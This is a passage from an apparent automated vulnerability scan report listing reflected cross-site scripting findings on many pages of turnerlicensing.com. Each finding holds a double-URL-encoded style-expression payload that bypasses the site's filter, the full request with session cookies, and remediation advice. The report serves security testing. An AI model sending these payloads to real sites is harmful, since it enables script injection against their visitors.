GET /teams_by_state/Washington-D-C?9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.237. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/West-Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3347'style='x:expression(alert(1))'6cb889a7789 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/West-Virginia?e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.238. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wisconsin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a45e'style='x:expression(alert(1))'841fffba0cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Wisconsin?9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.239. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wyoming
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17380'style='x:expression(alert(1))'10b3c762605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Wyoming?17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.240. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5edf2'style='x:expression(alert(1))'d6b4ca84651 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner?5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.241. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_about_us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12db7'style='x:expression(alert(1))'560f4d45a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_about_us?12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.242. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_boxed_note_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372c9'style='x:expression(alert(1))'137ac6a221e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_boxed_note_cards?372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.243. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_christmas_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8303b'style='x:expression(alert(1))'fa4a56a0150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_christmas_cards?8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.244. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_deluxe_journals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba999'style='x:expression(alert(1))'d367c03018a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_deluxe_journals?ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.245. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_frequently_asked_questions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e4b5'style='x:expression(alert(1))'c1c6aa6bced in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_frequently_asked_questions?7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.246. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_mini_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511bd'style='x:expression(alert(1))'e16792023be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_mini_wall_calendars?511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.247. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1dc3'style='x:expression(alert(1))'ff1d101c939 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_notebooks?b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.248. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_payment_options
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6ff'style='x:expression(alert(1))'e20c6c92743 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_payment_options?1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.249. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_privacy_security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa83d'style='x:expression(alert(1))'495e2755ee9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_privacy_security?aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.250. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_puzzles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15822'style='x:expression(alert(1))'e24cf7166ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_puzzles?15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.251. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_returns_exchanges
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440f0'style='x:expression(alert(1))'ca6e7ba9e71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
